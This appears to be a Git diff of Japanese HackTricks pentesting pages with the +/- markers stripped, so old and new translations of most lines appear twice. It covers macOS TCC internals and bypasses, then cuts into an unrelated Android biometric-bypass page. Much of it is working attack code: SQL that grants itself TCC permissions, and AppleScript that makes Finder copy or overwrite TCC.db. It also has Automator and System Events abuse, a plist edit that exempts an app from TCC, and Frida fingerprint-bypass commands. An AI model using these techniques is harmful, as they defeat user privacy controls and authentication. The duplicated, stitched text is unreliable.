* SIP 保護されたファイル **`/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist`**しかし誰でも読めるは、TCC 例外が必要なアプリケーションの許可リストです。&#x20;
- **`/var/db/locationd/clients.plist`** には、**位置情報サービスにアクセスを許可されたクライアント**を示す第三のTCCデータベースがあります。
- SIP保護ファイル **`/Users/carlospolop/Downloads/REG.db`**TCCによる読み取りアクセスも保護されていますには、すべての**有効なTCCデータベースの場所**が含まれています。
- SIP保護ファイル **`/Users/carlospolop/Downloads/MDMOverrides.plist`**TCCによる読み取りアクセスも保護されていますには、さらにTCCが許可された権限が含まれています。
- SIP保護ファイル **`/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist`**誰でも読み取り可能は、TCC例外が必要なアプリケーションの許可リストです。
{% hint style="success" %}
**iOS** TCC データベースは **`/private/var/mobile/Library/TCC/TCC.db`** にあります。
**iOS**のTCCデータベースは **`/private/var/mobile/Library/TCC/TCC.db`** にあります。
{% endhint %}
{% hint style="info" %}
**通知センター UI** は、システム TCC データベースに**変更を加える**ことができます:
**通知センターUI**は、**システムTCCデータベース**に変更を加えることができます:
{% code overflow="wrap" %}
```bash
@ -72,10 +70,10 @@ com.apple.rootless.storage.TCC
```
{% endcode %}
しかし、ユーザーは**`tccutil`** コマンドラインユーティリティを使用して**ルールを削除または照会**することができます。
ただし、ユーザーは**`tccutil`**コマンドラインユーティリティを使用して、**ルールを削除したりクエリしたり**することができます。
{% endhint %}
#### データベースの照会
#### データベースのクエリ
{% tabs %}
{% tab title="ユーザーDB" %}
@ -99,7 +97,7 @@ sqlite> select * from access where client LIKE "%telegram%" and auth_value=0;
{% endcode %}
{% endtab %}
{% tab title="システム DB" %}
{% tab title="システムDB" %}
{% code overflow="wrap" %}
```bash
sqlite3 /Library/Application\ Support/com.apple.TCC/TCC.db
@ -125,18 +123,18 @@ sqlite> select * from access where client LIKE "%telegram%" and auth_value=0;
{% endtabs %}
{% hint style="success" %}
アプリが許可している権限、禁止している権限、または持っていない権限(要求される)を両方のデータベースをチェックすることで確認できます。
両方のデータベースをチェックすることで、アプリが許可されている権限、禁止されている権限、または(求められる)権限がないかを確認できます。
{% endhint %}
* **`service`** はTCC **権限**の文字列表現です
* **`client`** は権限を持つ**バンドルID**または**バイナリへのパス**です
* **`client_type`** はバンドル識別子(0)か絶対パス(1)かを示します
- **`service`** は TCC **権限** の文字列表現です
- **`client`** は権限を持つ **バンドルID** または **バイナリのパス** です
- **`client_type`** はバンドル識別子0か絶対パス1かを示します
<details>
<summary>絶対パスの場合の実行方法</summary>
**`launctl load you_bin.plist`** を実行してください。plistは以下のようになります:
単に **`launctl load you_bin.plist`** を実行します。次のような plist を使用します:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
@ -175,9 +173,9 @@ sqlite> select * from access where client LIKE "%telegram%" and auth_value=0;
```
</details>
* **`auth_value`** には異なる値があります: denied(0), unknown(1), allowed(2), limited(3)。
* **`auth_reason`** は以下の値を取ることができます: Error(1), User Consent(2), User Set(3), System Set(4), Service Policy(5), MDM Policy(6), Override Policy(7), Missing usage string(8), Prompt Timeout(9), Preflight Unknown(10), Entitled(11), App Type Policy(12)
* **csreq** フィールドは、バイナリを検証してTCC権限を付与する方法を示しています
* **`auth_value`**の値は異なる可能性があります: denied(0), unknown(1), allowed(2), or limited(3).
* **`auth_reason`**の値は以下のいずれかを取ることができます: Error(1), User Consent(2), User Set(3), System Set(4), Service Policy(5), MDM Policy(6), Override Policy(7), Missing usage string(8), Prompt Timeout(9), Preflight Unknown(10), Entitled(11), App Type Policy(12)
* **csreq**フィールドは、実行するバイナリを検証し、TCC権限を付与する方法を示すために存在しています:
```bash
# Query to get cserq in printable hex
select service, client, hex(csreq) from access where auth_value=2;
@ -193,12 +191,12 @@ echo "$REQ_STR" | csreq -r- -b /tmp/csreq.bin
REQ_HEX=$(xxd -p /tmp/csreq.bin | tr -d '\n')
echo "X'$REQ_HEX'"
```
* テーブルの**他のフィールド**についての詳細は、[**このブログ投稿をチェックしてください**](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive)。
* テーブルの**他のフィールド**に関する詳細は、[このブログ投稿](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive)をチェックしてください
アプリに**既に与えられている権限**を `システム環境設定 --> セキュリティとプライバシー --> プライバシー --> ファイルとフォルダ` で確認することもできます。
また、`システム環境設定 --> セキュリティとプライバシー --> プライバシー --> ファイルとフォルダ`でアプリケーションに**すでに与えられた権限**を確認できます。
{% hint style="success" %}
ユーザーは **`tccutil`** を使用してルールを**削除または照会**_できます_。&#x20;
ユーザーは、**`tccutil`**を使用して**ルールを削除またはクエリ**できます。
{% endhint %}
#### TCC権限のリセット
@ -209,11 +207,9 @@ tccutil reset All app.some.id
# Reset the permissions granted to all apps
tccutil reset All
```
### TCC 署名チェック
### TCC Signature Checks
TCC **データベース**はアプリケーションの**Bundle ID**を保存しますが、許可を求めるアプリが正しいものであることを**確認する**ために、**署名**に関する**情報**も**保存**します。
{% code overflow="wrap" %}
TCCの**データベース**はアプリケーションの**Bundle ID**を保存しますが、**許可を求める**アプリが正しいものであることを確認するために**署名**に関する**情報**も保存します。
```bash
# From sqlite
sqlite> select service, client, hex(csreq) from access where auth_value=2;
@ -228,17 +224,17 @@ csreq -t -r /tmp/telegram_csreq.bin
{% endcode %}
{% hint style="warning" %}
したがって、同じ名前とバンドルIDを使用する他のアプリケーションは、他のアプリに付与された権限にアクセスすることできません。
したがって、同じ名前とバンドルIDを使用する他のアプリケーションは、他のアプリに付与された権限にアクセスすることできません。
{% endhint %}
### エンタイトルメントとTCC権限
アプリはリソースへの**アクセスを要求し、アクセスが許可されるだけでなく**、**関連するエンタイトルメントを持っている必要があります**。\
例えば**Telegram**は、**カメラへのアクセスを要求する**ために`com.apple.security.device.camera`というエンタイトルメントを持っています。この**エンタイトルメントを持っていないアプリ**はカメラにアクセスすることが**できず**、ユーザーに権限を求めることもありません
アプリケーションは、リソースにアクセスをリクエストし、許可されたアクセスを持つだけでなく、関連するエンタイトルメントを持つ必要があります。\
たとえば、Telegramは`com.apple.security.device.camera`というエンタイトルメントを持っており、カメラへのアクセスをリクエストします。このエンタイトルメントを持たないアプリケーションは、カメラにアクセスできません(ユーザーにはアクセス許可を求めることさえありません)
しかし、`~/Desktop`、`~/Downloads`、`~/Documents`などの**特定のユーザーフォルダへのアクセス**には、特定の**エンタイトルメントは必要ありません**。システムはアクセスを透過的に処理し、必要に応じて**ユーザーにプロンプトを表示します**
ただし、`~/Desktop`、`~/Downloads`、`~/Documents`などの特定のユーザーフォルダにアクセスするためには、特定のエンタイトルメントを持つ必要はありません。システムはアクセスを透過的に処理し、必要に応じてユーザーにプロンプトを表示します。
Appleのアプリは**プロンプトを生成しません**。それらには**事前に付与された権利**が**エンタイトルメントリスト**に含まれており、**ポップアップを生成することはなく**、**TCCデータベースにも表示されません**。例えば:
Appleのアプリケーションはプロンプトを生成しません。それらはエンタイトルメントリストに事前に付与された権利を含んでおり、ポップアップを生成することは決してなく、TCCデータベースのいずれにも表示されません。たとえば:
```bash
codesign -dv --entitlements :- /System/Applications/Calendar.app
[...]
@ -249,23 +245,23 @@ codesign -dv --entitlements :- /System/Applications/Calendar.app
<string>kTCCServiceAddressBook</string>
</array>
```
の操作により、カレンダーがリマインダー、カレンダー、およびアドレス帳へのアクセスをユーザーに求めることを避けることができます。
れにより、カレンダーがユーザーにリマインダー、カレンダー、およびアドレス帳へのアクセスを求めることを避できます。
{% hint style="success" %}
エンタイトルメントに関する公式ドキュメントの他に、[**https://newosxbook.com/ent.jl**](https://newosxbook.com/ent.jl) でエンタイトルメントについての**興味深い非公式情報**も見つけることができます。
権限に関する公式ドキュメントに加えて、[**https://newosxbook.com/ent.jl**](https://newosxbook.com/ent.jl) で権限に関する非公式な**興味深い情報**を見つけることも可能です。
{% endhint %}
いくつかのTCC権限には、kTCCServiceAppleEvents、kTCCServiceCalendar、kTCCServicePhotosなどがあります。これらを定義する公開リストはありませんが、[**既知のリスト**](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive#service)を確認することができます。
一部のTCC権限は、kTCCServiceAppleEvents、kTCCServiceCalendar、kTCCServicePhotosなどです。すべてを定義する公開リストはありませんが、[**既知のリスト**](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive#service)をチェックできます。
### センシティブで保護されていない場所
### 保護されていない機密情報の場所
* $HOME(自体)
* $HOME/.ssh、$HOME/.awsなど
* $HOME (自体)
* $HOME/.ssh、$HOME/.aws など
* /tmp
### ユーザーの意図 / com.apple.macl
以前に述べたように、アプリにファイルをドラッグ&ドロップすることで**そのアプリにファイルへのアクセスを許可する**ことが可能です。このアクセスはTCCデータベースには記載されませんが、ファイルの**拡張属性**として保存されます。この属性は許可されたアプリの**UUIDを保存**します。
前述のように、ファイルをアプリにドラッグ&ドロップすることで、そのアプリにファイルへのアクセスを許可することが可能です。このアクセスはTCCデータベースには特定されませんが、ファイルの**拡張属性**として保存されます。この属性には許可されたアプリの**UUID**が格納されます。
```bash
xattr Desktop/private.txt
com.apple.macl
@ -281,22 +277,22 @@ otool -l /System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal| gr
uuid 769FD8F1-90E0-3206-808C-A8947BEBD6C3
```
{% hint style="info" %}
**`com.apple.macl`** 属性は、tccdではなく**Sandbox**によって管理されていることが興味深いです
**`com.apple.macl`**属性が**Sandbox**によって管理されている点は興味深いですが、tccdではありません
また、あなたのコンピューターのアプリのUUIDを許可するファイルを別のコンピューターに移動した場合、同じアプリでも異なるUIDを持つため、そのアプリにアクセスを許可しないことに注意してください
また、コンピュータ内のアプリのUUIDを許可するファイルを別のコンピュータに移動すると、同じアプリでも異なるUIDを持つため、そのアプリにアクセス権が付与されません
{% endhint %}
拡張属性 `com.apple.macl` は、**SIPによって保護されている**ため、他の拡張属性のように**クリアすることはできません**。しかし、[**この投稿で説明されているように**](https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/)、ファイルを**圧縮**して、**削除**してから**解凍**することで無効にすることが可能です。
拡張属性`com.apple.macl`は、他の拡張属性とは異なり、**SIPによって保護**されているため、**クリアできません**。ただし、[**この投稿で説明されているように**](https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/)、ファイルを**圧縮**して、**削除**して**解凍**することで無効にすることが可能です。
## TCC Privesc & Bypasses
## TCC特権昇格とバイパス
### TCCに挿入
いつかTCCデータベースに対する書き込みアクセスを得ることができたら、以下のようなものを使用してエントリを追加することができますコメントは削除してください):
ある時点でTCCデータベースに対して書き込みアクセス権を取得できた場合、以下のような方法でエントリを追加できますコメントを削除してください):
<details>
<summary>TCCに挿入する</summary>
<summary>TCCに挿入</summary>
```sql
INSERT INTO access (
service,
@ -338,24 +334,24 @@ strftime('%s', 'now') -- last_reminded with default current timestamp
```
</details>
### TCCペイロード
### TCC ペイロード
TCCの権限を持つアプリ内に侵入できた場合、それらを悪用するための以下のページにあるTCCペイロードを確認してください
アプリ内でいくつかの TCC 権限を取得した場合は、次のページをチェックして TCC ペイロードを悪用してください:
{% content-ref url="macos-tcc-payloads.md" %}
[macos-tcc-payloads.md](macos-tcc-payloads.md)
{% endcontent-ref %}
### Automation (Finder) から FDA\* へ
### 自動化Finderから FDA\*
Automation権限のTCC名は**`kTCCServiceAppleEvents`**\
この特定のTCC権限は、TCCデータベース内で**管理できるアプリケーション**も示しています(つまり、権限はすべてを管理できるわけではありません)。
自動化権限の TCC 名は: **`kTCCServiceAppleEvents`**\
この特定の TCC 権限は、TCC データベース内で管理できる**アプリケーションを示す**(つまり、権限はすべてを管理するだけではありません)。
**Finder**は、UIに表示されなくても**常にFDAを持っている**アプリケーションです。したがって、Finderに対する**Automation**権限を持っている場合、その権限を悪用して**いくつかのアクションを実行させる**ことができます。\
この場合、あなたのアプリは**`com.apple.Finder`**に対する**`kTCCServiceAppleEvents`**の権限が必要になります。
**Finder** は、**常に FDA を持っています**UI に表示されなくても)、そのため、それに対して **自動化** 権限がある場合、その権限を悪用して **いくつかのアクションを実行** させることができます。\
この場合、あなたのアプリは **`com.apple.Finder`** 上の **`kTCCServiceAppleEvents`** 権限が必要です。
{% tabs %}
{% tab title="ユーザーのTCC.dbを盗む" %}
{% tab title="ユーザーの TCC.db を盗む" %}
```applescript
# This AppleScript will copy the system TCC database into /tmp
osascript<<EOD
@ -382,25 +378,23 @@ EOD
{% endtab %}
{% endtabs %}
これを悪用して**独自のユーザーTCCデータベースを書く**ことができます。
これを悪用して、**独自のユーザーTCCデータベースを作成**することができます。
{% hint style="warning" %}
この権限を持っていると、**FinderにTCC制限フォルダへのアクセスを要求**してファイルを取得することができますが、知る限り**Finderに任意のコードを実行させて**そのFDAアクセスを完全に悪用することはできません。
したがって、FDAの能力を完全に悪用することはできません。
この権限を持つと、**FinderにTCC制限フォルダへのアクセスを要求**してファイルを取得することができますが、afaik **Finderに任意のコードを実行させることはできません**。そのため、FDAアクセスを完全に悪用することはできません。
{% endhint %}
これはFinderに対する自動化権限を得るためのTCCプロンプトです
これはFinderに対してAutomation権限を取得するためのTCCプロンプトです
<figure><img src="../../../../.gitbook/assets/image (1) (1).png" alt="" width="244"><figcaption></figcaption></figure>
<figure><img src="../../../../.gitbook/assets/image (1) (1) (1).png" alt="" width="244"><figcaption></figcaption></figure>
{% hint style="danger" %}
**Automator**アプリがTCC権限**`kTCCServiceAppleEvents`**を持っているため、Finderのような**任意のアプリを制御**できることに注意してください。したがって、Automatorを制御する権限を持っていれば、以下のようなコードで**Finder**も制御できる可能性があります:
**Automator**アプリがTCC権限**`kTCCServiceAppleEvents`**を持っているため、Finderのようなアプリを**制御**することができます。したがって、Automatorを制御する権限があれば、以下のコードのように**Finder**を制御することもできます:
{% endhint %}
<details>
<summary>Automator内でシェルを取得する</summary>
<summary>Automator内でシェルを取得</summary>
```applescript
osascript<<EOD
set theScript to "touch /tmp/something"
@ -422,11 +416,11 @@ EOD
```
</details>
**Script Editor アプリ**では、Finderを制御できますが、AppleScriptを使用してスクリプトの実行を強制することはできません。
**スクリプトエディターアプリ**でも同じことが起こります。Finderを制御できますが、AppleScriptを使用してスクリプトを実行することはできません。
### オートメーション (SE) から一部の TCC へ
### オートメーションSEへの一部のTCC
**System Events はフォルダアクションを作成でき、フォルダアクションは一部の TCC フォルダ**(デスクトップ、ドキュメント、ダウンロード)にアクセスできるため、以下のようなスクリプトを使用してこの挙動を悪用することができます:
**システムイベントはフォルダアクションを作成でき、フォルダアクションは一部のTCCフォルダにアクセスできます**(デスクトップ、ドキュメント&ダウンロード)。したがって、次のようなスクリプトを使用してこの動作を悪用することができます:
```bash
# Create script to execute with the action
cat > "/tmp/script.js" <<EOD
@ -468,11 +462,11 @@ EOD
touch "$HOME/Desktop/file"
rm "$HOME/Desktop/file"
```
### オートメーション (SE) + アクセシビリティ (**`kTCCServicePostEvent`|**`kTCCServiceAccessibility`**)** から FDA\* へ
### 自動化SE+ アクセシビリティ(**`kTCCServicePostEvent`|**`kTCCServiceAccessibility`**によるFDA\*
**`System Events`** 上のオートメーション + アクセシビリティ (**`kTCCServicePostEvent`**) は、**プロセスへのキーストロークを送信**することを可能にします。この方法を利用して、Finderを悪用してユーザーの TCC.db を変更したり、任意のアプリに FDA を与えることができます(ただし、これにはパスワードの入力が求められる可能性があります)。
**`System Events`** 上での自動化 + アクセシビリティ(**`kTCCServicePostEvent`**)を使用すると、**プロセスにキーストロークを送信**できます。これにより、Finderを悪用してユーザーのTCC.dbを変更したり、FDAを任意のアプリに付与したりすることができますただし、これにはパスワードの入力が求められる場合があります)。
Finder がユーザーの TCC.db を上書きする例:
FinderによるユーザーのTCC.db 上書きの例:
```applescript
-- store the TCC.db file to copy in /tmp
osascript <<EOF
@ -518,46 +512,48 @@ keystroke "v" using {command down}
end tell
EOF
```
### `kTCCServiceAccessibility` から FDA\* への昇格
### `kTCCServiceAccessibility`からFDAへのエスカレーション
[**アクセシビリティ権限を悪用するペイロード**](macos-tcc-payloads.md#accessibility)については、このページを確認してください。例えば、FDA\* への権限昇格やキーロガーの実行が可能です。
[**アクセシビリティ権限を悪用するためのペイロード**](macos-tcc-payloads.md#accessibility)をチェックして、FDA\*にエスカレーションしたり、例えばキーロガーを実行したりできます。
### **エンドポイントセキュリティクライアントから FDA へ**
### **エンドポイントセキュリティクライアントからFDAへ**
**`kTCCServiceEndpointSecurityClient`** を持っていれば、FDA を持っています。終わり
**`kTCCServiceEndpointSecurityClient`**を持っていれば、FDAを持っています。以上
### システムポリシーSysAdminファイルから FDA
### システムポリシーシステム管理者ファイルからFDA
**`kTCCServiceSystemPolicySysAdminFiles`** は、ユーザーの **`NFSHomeDirectory`** 属性を **変更** することを許可し、これによりユーザーのホームフォルダーが変更され、TCC を **バイパス** することができます。
**`kTCCServiceSystemPolicySysAdminFiles`**は、ユーザーの**`NFSHomeDirectory`**属性を変更し、ユーザーのホームフォルダを変更することができ、それにより**TCCをバイパス**することができます。
### ユーザー TCC DB から FDA
### ユーザーTCCデータベースからFDA
ユーザー TCC データベースに対する **書き込み権限** を取得しても、自分自身に **`FDA`** 権限を付与することは **できません**。システムデータベースに存在するものだけがその権限を付与できます。
ユーザーTCCデータベースに**書き込み権限**を取得すると、自分に**`FDA`**権限を付与することはできませんが、システムデータベースに存在する権限を付与することができます。
しかし、**`Finder への自動化権限`** を自分自身に付与し、前述のテクニックを悪用して FDA\* に昇格することは **可能です**
しかし、**`Finderへの自動化権限`**を自分に付与し、前述の手法を悪用してFDA\*にエスカレーションすることができます
### **FDA から TCC 権限へ**
### **FDAからTCC権限へ**
**フルディスクアクセス** TCC 名は **`kTCCServiceSystemPolicyAllFiles`** です。
**フルディスクアクセス**のTCC名は**`kTCCServiceSystemPolicyAllFiles`**です。
これが実際に権限昇格になるとは思いませんが、役立つかもしれないので念のために記載しますFDA を制御するプログラムを持っている場合、ユーザーの TCC データベースを **変更し、任意のアクセス権を自分自身に付与することができます**。これは、FDA 権限を失う可能性がある場合の持続性テクニックとして有用かもしれません。
これは実際にはリアルなエスカレーションではないと思いますが、念のため便利かもしれません: FDAを持つプログラムを制御できる場合、**ユーザーTCCデータベースを変更して任意のアクセス権を自分に付与**することができます。これはFDA権限を失った場合の持続性テクニックとして役立つかもしれません。
### **SIP バイパスから TCC バイパスへ**
### **SIPバイパスからTCCバイパスへ**
システムの **TCC データベース** **SIP** によって保護されているため、指定された権限を持つプロセスのみがそれを **変更することができます**。したがって、攻撃者が **ファイル** に対する **SIP バイパス**SIP によって制限されたファイルを変更できる)を見つけた場合、以下のようにすることができます:
システムの**TCCデータベース**は**SIP**によって保護されているため、**指定された権限を持つプロセスのみが変更できます**。したがって、攻撃者が**SIPバイパス**を見つけるとSIPによって制限されたファイルを変更できるようになる、次のことができます:
* TCC データベースの保護を **解除し**、自分自身にすべての TCC 権限を付与します。例えば、これらのファイルを悪用できます:
* TCC システムデータベース
* TCCデータベースの保護を**解除**し、自分にすべてのTCC権限を付与できます。たとえば、次のファイルを悪用できます:
* TCCシステムデータベース
* REG.db
* MDMOverrides.plist
しかし、**SIP バイパスを悪用して TCC をバイパスする** 別の方法があります。ファイル `/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist` は、TCC 例外が必要なアプリケーションの許可リストです。したがって、攻撃者がこのファイルの **SIP 保護を解除** し、自分の **アプリケーションを追加** することができれば、そのアプリケーションは TCC をバイパスできるようになります。\
例えば、ターミナルを追加するには:
ただし、この**SIPバイパスをTCCバイパスに悪用**する別のオプションがあります。ファイル`/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist`は、TCC例外を必要とするアプリケーションの許可リストです。したがって、攻撃者がこのファイルからSIP保護を**解除**し、**独自のアプリケーション**を追加できるようにすれば、そのアプリケーションはTCCをバイパスできます。\
たとえば、ターミナルを追加する場合:
```bash
# Get needed info
codesign -d -r- /System/Applications/Utilities/Terminal.app
```
AllowApplicationsList.plist:
### AllowApplicationsList.plist:
### AllowApplicationsList.plist:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
@ -591,20 +587,18 @@ AllowApplicationsList.plist:
* [**https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive**](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive)
* [**https://gist.githubusercontent.com/brunerd/8bbf9ba66b2a7787e1a6658816f3ad3b/raw/34cabe2751fb487dc7c3de544d1eb4be04701ac5/maclTrack.command**](https://gist.githubusercontent.com/brunerd/8bbf9ba66b2a7787e1a6658816f3ad3b/raw/34cabe2751fb487dc7c3de544d1eb4be04701ac5/maclTrack.command)
* [**https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/**](https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/)
* [**https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/**](https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/)
* [**https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/**](https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/)
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) で AWS ハッキングをゼロからヒーローまで学ぶ</strong></summary>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricks をサポートする他の方法:
* **HackTricks にあなたの会社を広告したい**、または **HackTricks を PDF でダウンロードしたい** 場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式 PEASS & HackTricks グッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFT**](https://opensea.io/collection/the-peass-family) コレクションをチェックす
* 💬 [**Discord グループ**](https://discord.gg/hRep4RUj7f) に**参加する**か、[**テレグラム グループ**](https://t.me/peass) に参加する、または Twitter 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) を **フォローする**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) の GitHub リポジトリに PR を提出して、あなたのハッキングのコツを **共有する**
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つけ
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) または [**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) をフォローする**
* **HackTricks** と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
</details>

64
mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md
View file

@ -1,20 +1,20 @@
# Androidでの生体認証バイパス
# バイオメトリック認証のバイパスAndroid
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社**で働いていますか?**HackTricksで会社の広告を掲載**したいですか?または、**最新版のPEASSを入手**したり、**HackTricksをPDFでダウンロード**したいですか?[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションです。
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**にフォローしてください。**
* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有してください。**
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクション
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>
### **方法1 Crypto Objectを使用しないバイパス**
### **方法1 暗号オブジェクトの使用なしでのバイパス**
ここでの焦点は、認証プロセスにおいて重要な*onAuthenticationSucceeded*コールバックにあります。WithSecureの研究者が開発した[Fridaスクリプト](https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js)を使用すると、*onAuthenticationSucceeded(...)*のNULL *CryptoObject*をバイパスできます。このスクリプトは、メソッドの呼び出し時に指紋認証を自動的にバイパスするように強制します。以下は、Androidの指紋コンテキストでのバイパスを示す簡略化されたスニペットで、完全なアプリケーションは[GitHub](https://github.com/St3v3nsS/InsecureBanking)で利用可能です。
ここでは、認証プロセスで重要な*onAuthenticationSucceeded*コールバックに焦点を当てます。WithSecureの研究者たちは、[Fridaスクリプト](https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js)を開発し、*onAuthenticationSucceeded(...)*でのNULL *CryptoObject*のバイパスを可能にしました。このスクリプトは、メソッドの呼び出し時に指紋認証の自動バイパスを強制します。以下は、Androidの指紋コンテキストでのバイパスを示す簡略化されたスニペットであり、完全なアプリケーションは[GitHub](https://github.com/St3v3nsS/InsecureBanking)で入手できます。
```javascript
biometricPrompt = new BiometricPrompt(this, executor, new BiometricPrompt.AuthenticationCallback() {
@Override
@ -23,19 +23,21 @@ Toast.makeText(MainActivity.this,"Success",Toast.LENGTH_LONG).show();
}
});
```
実行するコマンド Frida スクリプト:
```bash
frida -U -f <package_name> -l <script_name.js> --no-pause
```
```bash
frida -U -f com.generic.insecurebankingfingerprint --no-pause -l fingerprint-bypass.js
```
### **方法2 例外処理アプローチ**
WithSecureが提供する[Fridaスクリプト](https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass-via-exception-handling.js)は、安全でない暗号オブジェクトの使用をバイパスする方法を対処します。このスクリプトは、指紋によって認証されていない*CrytoObject*を使って*onAuthenticationSucceeded*を呼び出します。アプリケーションが異なる暗号オブジェクトを使用しようとすると、例外が発生します。スクリプトは、_Cipher_ クラスで*javax.crypto.IllegalBlockSizeException*を処理しながら*onAuthenticationSucceeded*を呼び出す準備をします。これにより、アプリケーションが使用する後続のオブジェクトが新しいキーで暗号化されることを保証します。
別の[Fridaスクリプト](https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass-via-exception-handling.js)は、セキュリティの脆弱な暗号オブジェクトの使用をバイパスする方法についてWithSecureが取り組んでいます。このスクリプトは、指紋によって認証されていない*CryptoObject*を使用して*onAuthenticationSucceeded*を呼び出します。アプリケーションが異なる暗号オブジェクトを使用しようとすると、例外が発生します。このスクリプトは、*onAuthenticationSucceeded*を呼び出す準備をし、_Cipher_クラスで*javax.crypto.IllegalBlockSizeException*を処理して、アプリケーションによって使用される後続のオブジェクトが新しいキーで暗号化されることを確認します。
Fridaスクリプトを実行するコマンド
```bash
frida -U -f com.generic.insecurebankingfingerprint --no-pause -l fingerprint-bypass-via-exception-handling.js
```
指紋認証画面に到達し、`authenticate()` の開始時に、Fridaコンソールで `bypass()` を入力してバイパスをアクティブにします:
